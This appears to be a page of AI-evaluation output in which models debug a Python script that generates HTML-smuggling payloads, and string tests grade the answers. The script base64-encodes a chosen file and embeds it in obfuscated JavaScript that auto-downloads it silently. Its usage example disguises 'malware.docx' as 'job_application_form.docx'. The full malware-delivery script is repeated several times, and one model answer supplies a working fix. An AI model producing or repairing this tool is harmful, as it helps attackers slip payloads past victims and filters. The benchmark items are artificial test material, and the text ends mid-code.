"""ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
The given code has a bug as it's trying to save the generated script to the wrong file. It attempts to save it to `file_name`, which is the filename of the original document, instead of the intended `outfile` named `script.txt`. To fix this, the following line should be modified:
1 | with open(file=file_name, encoding='utf-8', mode="w") as wfile: |
1 | with open(file=outfile, encoding='utf-8', mode="w") as wfile: |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 | import random,string, sys, os, base64 # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """[' |
Testing if the previous output contains the string file_name: True
Testing if the previous output contains the string with open(file=outfile: True
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
The code has an issue while creating `script.txt`. The code creates the file properly, but it doesn't write the `template` variable to it. To fix this, add the following line after the `template` variable:
1 2 | with open(file="script.txt", encoding='utf-8', mode="w") as wfile: wfile.write(template) |
Testing if the previous output contains the string file_name: False
Testing if the previous output contains the string with open(file=outfile: False
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() data_base64_bytes = base64.b64encode(file_bytes) del file_bytes, filepath file_base64 = data_base64_bytes.decode(encoding='UTF-8') del data_base64_bytes rndm = rndm_sequences() template = """<script> var """ + rndm[0] + """=""" + rndm[0] + """;(function(""" + rndm[1] + """,""" + rndm[ 2] + """){var """ + rndm[3] + """=""" + rndm[0] + """,""" + rndm[4] + """=""" + rndm[ 1] + """();while(!![]){try{var """ + rndm[5] + """=-parseInt(""" + rndm[ 3] + """(0x1b1))/0x1+-parseInt(""" + rndm[3] + """(0x1a7))/0x2+parseInt(""" + rndm[ 3] + """(0x1b3))/0x3+-parseInt(""" + rndm[3] + """(0x1bd))/0x4*(parseInt(""" + rndm[ 3] + """(0x1b6))/0x5)+parseInt(""" + rndm[3] + """(0x1b4))/0x6*(parseInt(""" + rndm[ 3] + """(0x1a8))/0x7)+parseInt(""" + rndm[3] + """(0x1b9))/0x8+-parseInt(""" + rndm[ 3] + """(0x1b7))/0x9;if(""" + rndm[5] + """===""" + rndm[2] + """)break;else """ + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}catch(""" + rndm[6] + """){""" + rndm[ 4] + """['push'](""" + rndm[4] + """['shift']());}}}(""" + rndm[7] + """,0x291fa));function """ + rndm[7] + """(){var """ + rndm[ 8] + """=['revokeObjectURL','508149iyQTpI','216tZOcWE','octet/stream','500685VYAZHK','2271357zoKGKP','length','2630616khEGdN','body','download','atob','4kKgjnM','createElement','214758lzjpsQ','44093NNfoUz','appendChild','buffer','URL','display:\x20none','click','charCodeAt','href','""" + file_name + """','96643zAJuKG'];""" + rndm[7] + """=function(){return """ + rndm[8] + """;};return """ + rndm[7] + """();}var """ + rndm[ 13] + """='""" + file_base64 + """',""" + rndm[14] + """=window[""" + rndm[0] + """(0x1bc)](""" + rndm[13] + """),""" + rndm[15] + """=new Uint8Array(""" + rndm[14] + """[""" + rndm[ 0] + """(0x1b8)]);for(var i=0x0;i<""" + rndm[14] + """[""" + rndm[0] + """(0x1b8)];i++){""" + rndm[ 15] + """[i]=""" + rndm[14] + """[""" + rndm[0] + """(0x1ae)](i);}function """ + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """){var """ + rndm[7] + """46=""" + rndm[7] + """();return """ + rndm[ 0] + """=function(""" + rndm[0] + """ed,""" + rndm[9] + """){""" + rndm[0] + """ed=""" + rndm[ 0] + """ed-0x1a7;var """ + rndm[11] + """=""" + rndm[7] + """46[""" + rndm[0] + """ed];return """ + rndm[11] + """;},""" + rndm[0] + """(""" + rndm[10] + """,""" + rndm[12] + """);}var """ + rndm[ 16] + """=new Blob([""" + rndm[15] + """[""" + rndm[0] + """(0x1aa)]],{'type':""" + rndm[ 0] + """(0x1b5)}),""" + rndm[17] + """=document[""" + rndm[0] + """(0x1be)]('a'),""" + rndm[ 18] + """=window[""" + rndm[0] + """(0x1ab)]['createObjectURL'](""" + rndm[16] + """);document[""" + rndm[0] + """(0x1ba)][""" + rndm[0] + """(0x1a9)](""" + rndm[17] + """),""" + rndm[ 17] + """['style']=""" + rndm[0] + """(0x1ac),""" + rndm[17] + """[""" + rndm[0] + """(0x1af)]=""" + rndm[18] + """,""" + rndm[17] + """[""" + rndm[0] + """(0x1bb)]=""" + rndm[0] + """(0x1b0),""" + rndm[ 17] + """[""" + rndm[0] + """(0x1ad)](),window[""" + rndm[0] + """(0x1ab)][""" + rndm[ 0] + """(0x1b2)](""" + rndm[18] + """); </script>""" with open(file=file_name, encoding='utf-8', mode="w") as wfile: wfile.write(template) del file_name, file_base64, rndm print() print(' Script File: "script.txt" ') print(' The script file has been created successfully.') print() except: print() print(' An unexpected error has occurred!') print() |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 | # def rndm_sequences(): rndm = [] for ii in range(0, 19): while True: unique = True tmpstr1 = random.sample(string.ascii_lowercase, k=2) tmpstr2 = random.sample(string.digits + string.ascii_lowercase, k=6) tmpstr = tmpstr1[0] + tmpstr1[1] + tmpstr2[0] + tmpstr2[1] + tmpstr2[2] + tmpstr2[3] + tmpstr2[4] + tmpstr2[5] for tmp in rndm: if tmp == tmpstr: unique = False break if unique: rndm.append(tmpstr) break return rndm # def arg(outfile): argv = sys.argv number = len(argv) if number == 3: filename = argv[1].replace('"',"") filepath = argv[2].replace('"',"") else: program = argv[0].split(sep='\')[-1].split(sep='/')[-1] print() print(" >> "+program+" file_name file_path" ) print(" >> "+program+" job_application_form.docx C:\Users\user0\Desktop\malware.docx") print() sys.exit(0) # (0) check file and permissions check_file_exist = os.access(filepath, os.F_OK) try: with open(file=outfile, encoding='utf-8', mode='w') as wfile: wfile.write("Trial") os.remove(outfile) check_write_permission = True except: check_write_permission = False if check_file_exist: if check_write_permission: return filename, filepath else: print() print(" Do not have permission to write or delete the file!") print() sys.exit(0) else: print() print(" The file not found!") print() sys.exit(0) # if __name__ == '__main__': outfile = "script.txt" try: file_name, filepath = arg(outfile) except: sys.exit(0) try: with open(file=filepath, mode='rb') as rbfile: file_bytes = rbfile.read() 